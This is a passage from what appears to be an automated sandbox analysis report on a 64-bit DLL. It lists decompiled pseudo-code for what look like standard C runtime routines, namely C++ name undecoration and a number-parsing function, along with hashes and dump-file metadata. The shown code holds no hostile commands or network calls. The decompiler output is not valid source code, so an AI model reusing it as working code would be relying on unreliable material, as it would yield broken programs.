                                                                      0x18000c9a4
                                                                      0x18000c9ad
                                                                      0x18000c9b4
                                                                      0x18000c9bd
                                                                      0x18000c9c6
                                                                      0x18000c9cd
                                                                      0x18000c9d5
                                                                      0x18000c9dd
                                                                      0x18000c9e2
                                                                      0x18000c9f2
                                                                      0x18000c9f7
                                                                      0x18000ca2e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                      • API String ID: 2943138195-2309034085
                                                                      • Opcode ID: 30f20b97d49f9b1f070e7daadaabe340ccae21d8439843330dc7576b578fe465
                                                                      • Instruction ID: d12fa28b9f4d246a1d5efdc24b2777a63ea49247f7ced7aa13857eaa23f95711
                                                                      • Opcode Fuzzy Hash: 30f20b97d49f9b1f070e7daadaabe340ccae21d8439843330dc7576b578fe465
                                                                      • Instruction Fuzzy Hash: B5E18E32A0464888FBA7DB74C9947FC37A1A75D7C8F54C116FE0A26A96DF39874C8342
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118000D698(void* __ebx, void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
                                                                      				void* __r14;
                                                                      				void* _t62;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t75;
                                                                      				intOrPtr _t82;
                                                                      				void* _t88;
                                                                      				void* _t91;
                                                                      				void* _t104;
                                                                      				signed long long _t105;
                                                                      				intOrPtr* _t107;
                                                                      				long long _t108;
                                                                      				intOrPtr* _t110;
                                                                      				intOrPtr* _t113;
                                                                      				long long _t118;
                                                                      				intOrPtr _t124;
                                                                      				long long _t125;
                                                                      				long long _t127;
                                                                      				intOrPtr _t130;
                                                                      				intOrPtr* _t132;
                                                                      				intOrPtr* _t134;
                                                                      				intOrPtr* _t137;
                                                                      				signed long long _t159;
                                                                      				intOrPtr* _t163;
                                                                      				void* _t165;
                                                                      				void* _t166;
                                                                      				void* _t168;
                                                                      				void* _t171;
                                                                      				char* _t175;
                                                                      				intOrPtr* _t176;
                                                                      				intOrPtr* _t177;
                                                                      				char* _t178;
                                                                      				void* _t181;
                                                                      				void* _t183;
                                                                      				long long* _t184;
                                                                      				void* _t186;
                                                                      
                                                                      				_t181 = __r11;
                                                                      				_t171 = __r8;
                                                                      				_t162 = __rsi;
                                                                      				_t160 = __rdi;
                                                                      				_t104 = _t168;
                                                                      				 *((long long*)(_t104 + 0x10)) = __rbx;
                                                                      				 *((long long*)(_t104 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t104 + 0x20)) = __rdi;
                                                                      				_t166 = _t104 - 0x5f;
                                                                      				_t105 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t166 + 0x37) = _t105 ^ _t168 - 0x00000090;
                                                                      				_t175 =  *0x80071308; // 0x0
                                                                      				r10b = r8b;
                                                                      				sil = __edx;
                                                                      				_t184 = __rcx;
                                                                      				r8d =  *_t175;
                                                                      				r8d = r8d + 0xffffffd0;
                                                                      				if (r8d - 9 > 0) goto 0x8000d701;
                                                                      				_t176 = _t175 + 1;
                                                                      				_t130 =  *0x800712f8; // 0x0
                                                                      				 *0x80071308 = _t176;
                                                                      				E00000001180005E0C(_t130, __rcx);
                                                                      				goto 0x8000d951;
                                                                      				r15d = 0;
                                                                      				if ( *_t176 != 0x3f) goto 0x8000d75f;
                                                                      				E0000000118000C268(__ebx, __ecx, 0, __edi, __rbx, _t166 - 0x29, __rcx, __rdi, __rsi);
                                                                      				_t107 =  *0x80071308; // 0x0
                                                                      				_t108 = _t107 + 1;
                                                                      				 *0x80071308 = _t108;
                                                                      				if ( *_t107 == 0x40) goto 0x8000d90b;
                                                                      				 *0x80071308 = _t108 - 1;
                                                                      				asm("sbb edi, edi");
                                                                      				_t123 =  !=  ? _t186 : 0x8005f780;
                                                                      				goto 0x8000d90b;
                                                                      				_t110 = "template-parameter-";
                                                                      				_t132 = _t176;
                                                                      				r8d = 0x12;
                                                                      				r11d = r11d | 0xffffffff;
                                                                      				_t74 =  *_t132;
                                                                      				if (_t74 == 0) goto 0x8000d788;
                                                                      				_t88 = _t74 -  *_t110;
                                                                      				if (_t88 != 0) goto 0x8000d788;
                                                                      				r8d = r8d + r11d;
                                                                      				if (_t88 != 0) goto 0x8000d773;
                                                                      				if (( *(_t132 + 1) & 0x000000ff) != ( *(_t110 + 1) & 0x000000ff)) goto 0x8000d7a6;
                                                                      				 *((intOrPtr*)(_t166 - 0x21)) = 0x14;
                                                                      				_t177 = _t176 + 0x13;
                                                                      				goto 0x8000d7eb;
                                                                      				_t113 = "generic-type-";
                                                                      				_t134 = _t177;
                                                                      				r8d = 0xc;
                                                                      				_t75 =  *_t134;
                                                                      				if (_t75 == 0) goto 0x8000d7cb;
                                                                      				_t91 = _t75 -  *_t113;
                                                                      				if (_t91 != 0) goto 0x8000d7cb;
                                                                      				r8d = r8d + r11d;
                                                                      				if (_t91 != 0) goto 0x8000d7b6;
                                                                      				if (( *(_t134 + 1) & 0x000000ff) != ( *(_t113 + 1) & 0x000000ff)) goto 0x8000d8d5;
                                                                      				 *((intOrPtr*)(_t166 - 0x21)) = 0xe;
                                                                      				_t178 = _t177 + 0xd;
                                                                      				 *((long long*)(_t166 - 0x29)) = "`generic-type-";
                                                                      				asm("movaps xmm0, [ebp-0x29]");
                                                                      				asm("movdqa [ebp-0x9], xmm0");
                                                                      				 *0x80071308 = _t178;
                                                                      				E0000000118000BBA8( !=  ? _t186 : 0x8005f780, _t166 - 0x29, __rcx, _t162, _t171, __r10, _t181, __rcx);
                                                                      				if (( *0x80071318 & 0x00004000) == 0) goto 0x8000d8b2;
                                                                      				_t124 =  *0x80071320; // 0x0
                                                                      				if (_t124 == 0) goto 0x8000d8b2;
                                                                      				_t137 =  *((intOrPtr*)(_t166 - 0x29));
                                                                      				if (_t137 == 0) goto 0x8000d852;
                                                                      				 *0x8005d348();
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x18)))) = r15b;
                                                                      				_t125 =  *0x80071320; // 0x0
                                                                      				goto 0x8000d856;
                                                                      				 *((intOrPtr*)(_t166 + 0x27)) = r15b;
                                                                      				E00000001180039A54( *((intOrPtr*)( *_t137 + 0x18)), _t125, _t166 + 0x27, _t160, _t162, _t166 + 0x36, __r10, _t186, _t183);
                                                                      				_t118 = _t125;
                                                                      				 *0x8005d348();
                                                                      				if (_t118 == 0) goto 0x8000d883;
                                                                      				r8b = r15b;
                                                                      				E0000000118000543C(_t166 - 0x29, _t118);
                                                                      				goto 0x8000d905;
                                                                      				E000000011800059CC(_t118, _t166 + 0x17, _t166 - 9);
                                                                      				E00000001180005F48(_t118, _t166 - 9, _t166 - 0x29);
                                                                      				r8b = 0x27;
                                                                      				E00000001180005F74(_t166 - 9, _t166 + 7);
                                                                      				goto 0x8000d905;
                                                                      				E000000011800059CC(_t118, _t166 + 7, _t166 - 9);
                                                                      				E00000001180005F48(_t118, _t166 - 9, _t166 - 0x29);
                                                                      				goto 0x8000d8a4;
                                                                      				if (r10b == 0) goto 0x8000d8f2;
                                                                      				if ( *_t178 != 0x40) goto 0x8000d8f2;
                                                                      				 *0x80071308 = _t178 + 1;
                                                                      				goto 0x8000d90b;
                                                                      				r8b = 0x40;
                                                                      				E0000000118000591C(_t118, _t186, _t166 + 7, 0x80071308, _t162, _t165);
                                                                      				_t127 =  *_t118;
                                                                      				_t82 =  *((intOrPtr*)(_t118 + 8));
                                                                      				if (sil == 0) goto 0x8000d94a;
                                                                      				_t163 =  *0x800712f8; // 0x0
                                                                      				if ( *_t163 == 9) goto 0x8000d94a;
                                                                      				if (_t127 == 0) goto 0x8000d94a;
                                                                      				_t62 = E0000000118000A0A4(_t118, _t127, 0x80071330, 0x80071308, _t163);
                                                                      				if (_t118 == 0) goto 0x8000d94a;
                                                                      				 *_t118 = _t127;
                                                                      				 *((intOrPtr*)(_t118 + 8)) = _t82;
                                                                      				_t159 =  *_t163;
                                                                      				 *_t163 = _t159 + 1;
                                                                      				 *((long long*)(_t163 + 0x10 + _t159 * 8)) = _t118;
                                                                      				 *_t184 = _t127;
                                                                      				 *((intOrPtr*)(_t184 + 8)) = _t82;
                                                                      				return E000000011800028F0(_t62, _t159 + 1,  *(_t166 + 0x37) ^ _t168 - 0x00000090);
                                                                      			}






































                                                                      0x18000d698
                                                                      0x18000d698
                                                                      0x18000d698
                                                                      0x18000d698
                                                                      0x18000d698
                                                                      0x18000d69b
                                                                      0x18000d69f
                                                                      0x18000d6a3
                                                                      0x18000d6ac
                                                                      0x18000d6b7
                                                                      0x18000d6c1
                                                                      0x18000d6c5
                                                                      0x18000d6cc
                                                                      0x18000d6cf
                                                                      0x18000d6d2
                                                                      0x18000d6d5
                                                                      0x18000d6d9
                                                                      0x18000d6e1
                                                                      0x18000d6e3
                                                                      0x18000d6e9
                                                                      0x18000d6f0
                                                                      0x18000d6f7
                                                                      0x18000d6fc
                                                                      0x18000d701
                                                                      0x18000d708
                                                                      0x18000d710
                                                                      0x18000d71b
                                                                      0x18000d724
                                                                      0x18000d727
                                                                      0x18000d731
                                                                      0x18000d741
                                                                      0x18000d74e
                                                                      0x18000d756
                                                                      0x18000d75a
                                                                      0x18000d75f
                                                                      0x18000d766
                                                                      0x18000d769
                                                                      0x18000d76f
                                                                      0x18000d773
                                                                      0x18000d777
                                                                      0x18000d779
                                                                      0x18000d77b
                                                                      0x18000d783
                                                                      0x18000d786
                                                                      0x18000d790
                                                                      0x18000d799
                                                                      0x18000d7a0
                                                                      0x18000d7a4
                                                                      0x18000d7a6
                                                                      0x18000d7ad
                                                                      0x18000d7b0
                                                                      0x18000d7b6
                                                                      0x18000d7ba
                                                                      0x18000d7bc
                                                                      0x18000d7be
                                                                      0x18000d7c6
                                                                      0x18000d7c9
                                                                      0x18000d7d3
                                                                      0x18000d7e0
                                                                      0x18000d7e7
                                                                      0x18000d7eb
                                                                      0x18000d7f3
                                                                      0x18000d7f7
                                                                      0x18000d7fc
                                                                      0x18000d803
                                                                      0x18000d812
                                                                      0x18000d818
                                                                      0x18000d822
                                                                      0x18000d828
                                                                      0x18000d82f
                                                                      0x18000d840
                                                                      0x18000d846
                                                                      0x18000d849
                                                                      0x18000d850
                                                                      0x18000d852
                                                                      0x18000d85a
                                                                      0x18000d861
                                                                      0x18000d864
                                                                      0x18000d86d
                                                                      0x18000d86f
                                                                      0x18000d879
                                                                      0x18000d87e
                                                                      0x18000d88b
                                                                      0x18000d89b
                                                                      0x18000d8a4
                                                                      0x18000d8ab
                                                                      0x18000d8b0
                                                                      0x18000d8ba
                                                                      0x18000d8ca
                                                                      0x18000d8d3
                                                                      0x18000d8d8
                                                                      0x18000d8de
                                                                      0x18000d8e6
                                                                      0x18000d8f0
                                                                      0x18000d8f2
                                                                      0x18000d900
                                                                      0x18000d905
                                                                      0x18000d908
                                                                      0x18000d90e
                                                                      0x18000d910
                                                                      0x18000d91a
                                                                      0x18000d91f
                                                                      0x18000d92d
                                                                      0x18000d935
                                                                      0x18000d937
                                                                      0x18000d93a
                                                                      0x18000d93d
                                                                      0x18000d943
                                                                      0x18000d945
                                                                      0x18000d94a
                                                                      0x18000d94d
                                                                      0x18000d97c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Replicator::operator[]
                                                                      • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                      • API String ID: 3676697650-3207858774
                                                                      • Opcode ID: 4288d30a7ef8b42127a9f34a32c6ad81e5ee245b649f8dad6231e5e639e1ca59
                                                                      • Instruction ID: 5aadbd698c3c092a335ac8fccea90a894dd36fe162b9d9b91d68c9461f8f1d09
                                                                      • Opcode Fuzzy Hash: 4288d30a7ef8b42127a9f34a32c6ad81e5ee245b649f8dad6231e5e639e1ca59
                                                                      • Instruction Fuzzy Hash: 70917932604A8C89FB92CB25D4907EC37A1A75DBD9F88C112EA8D07796DF39C749C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E0000000118000929C(void* __ecx, void* __edx, long long __rbx, long long* __rcx, long long __rdi, void* __r8, long long __r9, long long _a8, long long _a24) {
                                                                      				void* _v8;
                                                                      				char _v24;
                                                                      				char _v56;
                                                                      				intOrPtr _v64;
                                                                      				void* _v72;
                                                                      				intOrPtr _t28;
                                                                      				void* _t29;
                                                                      				void* _t31;
                                                                      				void* _t33;
                                                                      				char* _t46;
                                                                      				long long* _t48;
                                                                      				long long* _t52;
                                                                      				void* _t54;
                                                                      				void* _t59;
                                                                      				void* _t61;
                                                                      				void* _t62;
                                                                      				void* _t64;
                                                                      				void* _t65;
                                                                      
                                                                      				_t59 = __r8;
                                                                      				_t38 = __rbx;
                                                                      				_t29 = __ecx;
                                                                      				_a8 = __rbx;
                                                                      				_a24 = __rdi;
                                                                      				_t46 =  *0x80071308; // 0x0
                                                                      				r9d = 0;
                                                                      				_t52 = __rcx;
                                                                      				r8d =  *_t46;
                                                                      				if (r8b != 0) goto 0x800092ff;
                                                                      				_t35 = "`unknown ecsu\'";
                                                                      				_v64 = 0xe;
                                                                      				_v72 = "`unknown ecsu\'";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				E000000011800059CC("`unknown ecsu\'",  &_v72,  &_v56);
                                                                      				r8d = 1;
                                                                      				_t48 = __rcx;
                                                                      				E00000001180005FCC(_t35, __rcx);
                                                                      				goto 0x80009359;
                                                                      				_v72 = __r9;
                                                                      				_v64 = r9d;
                                                                      				_t33 = r8b - 0x57;
                                                                      				if (_t33 != 0) goto 0x8000936e;
                                                                      				if (_t33 != 0) goto 0x80009385;
                                                                      				 *0x80071308 = _t48 + 1;
                                                                      				if (r8b != 0x57) goto 0x80009336;
                                                                      				E00000001180009494(_t31, __rbx,  &_v24, _t52, _t54);
                                                                      				E0000000118000BA6C(_t29, _t31, _t35, _t38,  &_v56, _t48 + 1, _t52, _t54, _t59, _t61, _t62, _t64, _t65);
                                                                      				E00000001180006090(_t29,  &_v72,  &_v56, _t59);
                                                                      				 *_t52 = _v72;
                                                                      				_t28 = _v64;
                                                                      				 *((intOrPtr*)(_t52 + 8)) = _t28;
                                                                      				return _t28;
                                                                      			}





















                                                                      0x18000929c
                                                                      0x18000929c
                                                                      0x18000929c
                                                                      0x18000929c
                                                                      0x1800092a1
                                                                      0x1800092ae
                                                                      0x1800092b5
                                                                      0x1800092b8
                                                                      0x1800092bb
                                                                      0x1800092c2
                                                                      0x1800092c4
                                                                      0x1800092cb
                                                                      0x1800092d2
                                                                      0x1800092da
                                                                      0x1800092e2
                                                                      0x1800092e7
                                                                      0x1800092ec
                                                                      0x1800092f2
                                                                      0x1800092f8
                                                                      0x1800092fd
                                                                      0x1800092ff
                                                                      0x180009303
                                                                      0x180009307
                                                                      0x18000930b
                                                                      0x18000931b
                                                                      0x180009320
                                                                      0x18000932b
                                                                      0x180009331
                                                                      0x18000933a
                                                                      0x180009347
                                                                      0x180009350
                                                                      0x180009353
                                                                      0x180009356
                                                                      0x18000936d

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$Name::operator+=
                                                                      • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                      • API String ID: 179159573-1464470183
                                                                      • Opcode ID: d898a7aed8fc8115088d76aa4579f2729d86e8ab4623689d8731ff9b74e79b7c
                                                                      • Instruction ID: 217c8becc99d5ca139c3d2a0fb222e6856fd201d9278ff2cc7e54ca20f41cd6e
                                                                      • Opcode Fuzzy Hash: d898a7aed8fc8115088d76aa4579f2729d86e8ab4623689d8731ff9b74e79b7c
                                                                      • Instruction Fuzzy Hash: D4512C71B11B1899F792CBA4E8407ED37B1B7087C8F508119FA4967B99DF29C749C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 76%
                                                                      			E000000011800078B0(void* __ecx, void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _v24;
                                                                      				char _v40;
                                                                      				char _v56;
                                                                      				char _v72;
                                                                      				intOrPtr _v80;
                                                                      				char _v88;
                                                                      				intOrPtr _v96;
                                                                      				char _v104;
                                                                      				char _v112;
                                                                      				char _v120;
                                                                      				void* __r14;
                                                                      				void* __r15;
                                                                      				void* _t66;
                                                                      				void* _t88;
                                                                      				void* _t90;
                                                                      				void* _t98;
                                                                      				intOrPtr* _t106;
                                                                      				intOrPtr* _t108;
                                                                      				intOrPtr* _t146;
                                                                      				intOrPtr* _t155;
                                                                      				long long* _t158;
                                                                      				void* _t169;
                                                                      				void* _t170;
                                                                      				void* _t172;
                                                                      				long long _t173;
                                                                      
                                                                      				_t112 = __rbx;
                                                                      				_t90 = __edx;
                                                                      				_t88 = __ecx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rsi;
                                                                      				_a24 = __rdi;
                                                                      				_t106 =  *0x80071308; // 0x0
                                                                      				r15d = 0;
                                                                      				_t155 = __rdx;
                                                                      				_t158 = __rcx;
                                                                      				if ( *_t106 == r15b) goto 0x80007a2b;
                                                                      				_t66 = E0000000118000A1AC(__rdx);
                                                                      				r14d = _t66;
                                                                      				_t98 = _t66;
                                                                      				if (_t98 < 0) goto 0x80007a97;
                                                                      				if (_t98 == 0) goto 0x80007a97;
                                                                      				_v120 = _t173;
                                                                      				_v112 = r15d;
                                                                      				if (( *(__rdx + 8) & 0x00000800) == 0) goto 0x80007938;
                                                                      				_v96 = 2;
                                                                      				_v104 = 0x8005eb10;
                                                                      				asm("movaps xmm0, [ebp-0x50]");
                                                                      				asm("movdqa [ebp-0x50], xmm0");
                                                                      				E00000001180006010(_t90, __edi, 0x8005eb10, __rbx,  &_v120,  &_v104, _t158);
                                                                      				goto 0x8000799b;
                                                                      				r14d = r14d - 1;
                                                                      				if (r14d == 0) goto 0x800079a1;
                                                                      				_t108 =  *0x80071308; // 0x0
                                                                      				if ( *_t108 == r15b) goto 0x800079a1;
                                                                      				E000000011800090E8(0, _t112,  &_v56, _t155, _t158, _t169, _t170, _t172);
                                                                      				_v104 = _t173;
                                                                      				_v96 = r15d;
                                                                      				_t113 = _t108;
                                                                      				E00000001180007320(0x5b, _t108, _t108,  &_v104);
                                                                      				E00000001180005F48( &_v104,  &_v72, _t108);
                                                                      				r8b = 0x5d;
                                                                      				E00000001180005F74( &_v72,  &_v40);
                                                                      				E00000001180006090(_t88,  &_v120, _t108, _t113);
                                                                      				if (_v112 - 1 <= 0) goto 0x80007938;
                                                                      				if ( *_t155 == _t173) goto 0x80007a08;
                                                                      				if (( *(_t155 + 8) & 0x00000800) == 0) goto 0x800079b8;
                                                                      				goto 0x800079f2;
                                                                      				_v104 = _t173;
                                                                      				_v96 = r15d;
                                                                      				E00000001180007320(0x28, _t108, _t113,  &_v104);
                                                                      				E00000001180005F48( &_v104,  &_v72, _t155);
                                                                      				r8b = 0x29;
                                                                      				E00000001180005F74( &_v72,  &_v40);
                                                                      				E00000001180005F48(_t108,  &_v56,  &_v120);
                                                                      				_v120 =  *_t108;
                                                                      				_v112 =  *((intOrPtr*)(_t108 + 8));
                                                                      				_t146 =  &_v120;
                                                                      				E0000000118000AD48(0x28, __edi, _t108, _t113,  &_v88, _t146, _t155, _t158,  &_v120, _t172, _t173);
                                                                      				asm("bts ecx, 0xb");
                                                                      				 *((intOrPtr*)(_t158 + 8)) = _v80;
                                                                      				 *_t158 = _v88;
                                                                      				goto 0x80007ad7;
                                                                      				if ( *_t146 == _t173) goto 0x80007a97;
                                                                      				_t110 = ")[";
                                                                      				_v80 = 2;
                                                                      				_v88 = ")[";
                                                                      				asm("movaps xmm0, [ebp-0x40]");
                                                                      				asm("movdqa [ebp-0x30], xmm0");
                                                                      				_v104 = _t173;
                                                                      				_v96 = r15d;
                                                                      				E00000001180007320(0x28, ")[", _t113,  &_v104);
                                                                      				E00000001180005F48( &_v104,  &_v88, _t155);
                                                                      				E00000001180005F1C( &_v88,  &_v40,  &_v72);
                                                                      				r8d = 1;
                                                                      				E00000001180005FCC(")[",  &_v56);
                                                                      				goto 0x80007ac1;
                                                                      				_v104 = _t173;
                                                                      				_v96 = r15d;
                                                                      				E00000001180007320(0x5b, _t110, _t113,  &_v104);
                                                                      				r8d = 1;
                                                                      				E00000001180005FCC( &_v104,  &_v40);
                                                                      				r8b = 0x5d;
                                                                      				E00000001180005F74(_t110,  &_v56);
                                                                      				return E00000001180007BF0(__edi, _t113, _t158, _t110, _t155, _t158, _t172, _t173);
                                                                      			}




























                                                                      0x1800078b0
                                                                      0x1800078b0
                                                                      0x1800078b0
                                                                      0x1800078b0
                                                                      0x1800078b5
                                                                      0x1800078ba
                                                                      0x1800078ce
                                                                      0x1800078d5
                                                                      0x1800078d8
                                                                      0x1800078db
                                                                      0x1800078e1
                                                                      0x1800078e7
                                                                      0x1800078ec
                                                                      0x1800078ef
                                                                      0x1800078f1
                                                                      0x1800078f7
                                                                      0x180007904
                                                                      0x180007908
                                                                      0x18000790c
                                                                      0x18000790e
                                                                      0x18000791c
                                                                      0x180007924
                                                                      0x18000792c
                                                                      0x180007931
                                                                      0x180007936
                                                                      0x18000793b
                                                                      0x180007940
                                                                      0x180007942
                                                                      0x18000794c
                                                                      0x180007954
                                                                      0x18000795b
                                                                      0x180007963
                                                                      0x180007967
                                                                      0x18000796a
                                                                      0x18000797a
                                                                      0x18000797f
                                                                      0x18000798a
                                                                      0x180007996
                                                                      0x18000799f
                                                                      0x1800079a4
                                                                      0x1800079ad
                                                                      0x1800079b6
                                                                      0x1800079ba
                                                                      0x1800079c2
                                                                      0x1800079c6
                                                                      0x1800079d6
                                                                      0x1800079db
                                                                      0x1800079e6
                                                                      0x1800079f6
                                                                      0x1800079fe
                                                                      0x180007a05
                                                                      0x180007a08
                                                                      0x180007a10
                                                                      0x180007a1c
                                                                      0x180007a20
                                                                      0x180007a23
                                                                      0x180007a26
                                                                      0x180007a2e
                                                                      0x180007a30
                                                                      0x180007a37
                                                                      0x180007a3e
                                                                      0x180007a46
                                                                      0x180007a4c
                                                                      0x180007a51
                                                                      0x180007a55
                                                                      0x180007a59
                                                                      0x180007a69
                                                                      0x180007a7a
                                                                      0x180007a7f
                                                                      0x180007a8c
                                                                      0x180007a95
                                                                      0x180007a99
                                                                      0x180007aa1
                                                                      0x180007aa5
                                                                      0x180007aaa
                                                                      0x180007ab8
                                                                      0x180007ac1
                                                                      0x180007ac7
                                                                      0x180007af6

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID:
                                                                      • API String ID: 2943138195-0
                                                                      • Opcode ID: f72f5227b2d4cca6b80ee2be8f08e3c715a5d89143d54e20dc585f51ffed18da
                                                                      • Instruction ID: 07ce2a78b67462768b04bd7a97d0866566b772e9847f10e1335de9a0d5989154
                                                                      • Opcode Fuzzy Hash: f72f5227b2d4cca6b80ee2be8f08e3c715a5d89143d54e20dc585f51ffed18da
                                                                      • Instruction Fuzzy Hash: E3613D72B10B5998FB42DBA4D8803DD37B1B7597C8F408425EE4D6BA9ADF78C649C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E000000011800384A8(intOrPtr* __rax, long long __rbx, long long __rcx, signed long long* __rdx, void* __r8, void* __r10, long long _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* _v64;
                                                                      				intOrPtr _v68;
                                                                      				intOrPtr _v72;
                                                                      				intOrPtr _v76;
                                                                      				intOrPtr _v80;
                                                                      				intOrPtr _v84;
                                                                      				intOrPtr _v88;
                                                                      				intOrPtr _v92;
                                                                      				intOrPtr _v96;
                                                                      				intOrPtr _v100;
                                                                      				intOrPtr _v104;
                                                                      				intOrPtr _v108;
                                                                      				intOrPtr _v112;
                                                                      				intOrPtr _v116;
                                                                      				intOrPtr _v120;
                                                                      				intOrPtr _v124;
                                                                      				intOrPtr _v128;
                                                                      				intOrPtr _v132;
                                                                      				intOrPtr _v136;
                                                                      				intOrPtr _v140;
                                                                      				intOrPtr _v144;
                                                                      				intOrPtr _v148;
                                                                      				intOrPtr _v152;
                                                                      				long long _v160;
                                                                      				signed long long _v168;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t152;
                                                                      				void* _t181;
                                                                      				signed int _t182;
                                                                      				void* _t187;
                                                                      				signed short _t190;
                                                                      				signed short _t191;
                                                                      				signed int _t192;
                                                                      				signed int _t232;
                                                                      				signed int _t241;
                                                                      				signed int _t243;
                                                                      				signed int _t246;
                                                                      				void* _t344;
                                                                      				void* _t345;
                                                                      				signed short* _t362;
                                                                      				signed long long _t363;
                                                                      				signed long long _t364;
                                                                      				signed long long _t367;
                                                                      				signed long long _t369;
                                                                      				signed long long* _t370;
                                                                      				long long _t376;
                                                                      				long long* _t379;
                                                                      				signed short* _t380;
                                                                      				long long* _t381;
                                                                      				long long* _t383;
                                                                      				long long* _t386;
                                                                      				signed long long* _t387;
                                                                      				void* _t388;
                                                                      				void* _t389;
                                                                      				signed long long _t390;
                                                                      				signed short* _t398;
                                                                      				signed short* _t399;
                                                                      				signed long long _t400;
                                                                      				long long _t403;
                                                                      				signed long long _t404;
                                                                      				signed long long _t405;
                                                                      				intOrPtr _t406;
                                                                      
                                                                      				_t383 = __rdx;
                                                                      				_t376 = __rbx;
                                                                      				_a24 = __rbx;
                                                                      				_a8 = __rcx;
                                                                      				_t403 =  *((intOrPtr*)(__rdx));
                                                                      				r13d = 0;
                                                                      				_t246 = r9b & 0xffffffff;
                                                                      				r15d = r8d;
                                                                      				_v64 = _t403;
                                                                      				_t387 = __rdx;
                                                                      				if (_t403 != 0) goto 0x800384f3;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 0x16;
                                                                      				E00000001180013928();
                                                                      				goto 0x80038525;
                                                                      				if (r15d == 0) goto 0x8003853d;
                                                                      				if (__r8 - 2 - 0x22 <= 0) goto 0x8003853d;
                                                                      				_v160 = __rcx;
                                                                      				r9d = 0;
                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__rcx + 0x2c)) = 0x16;
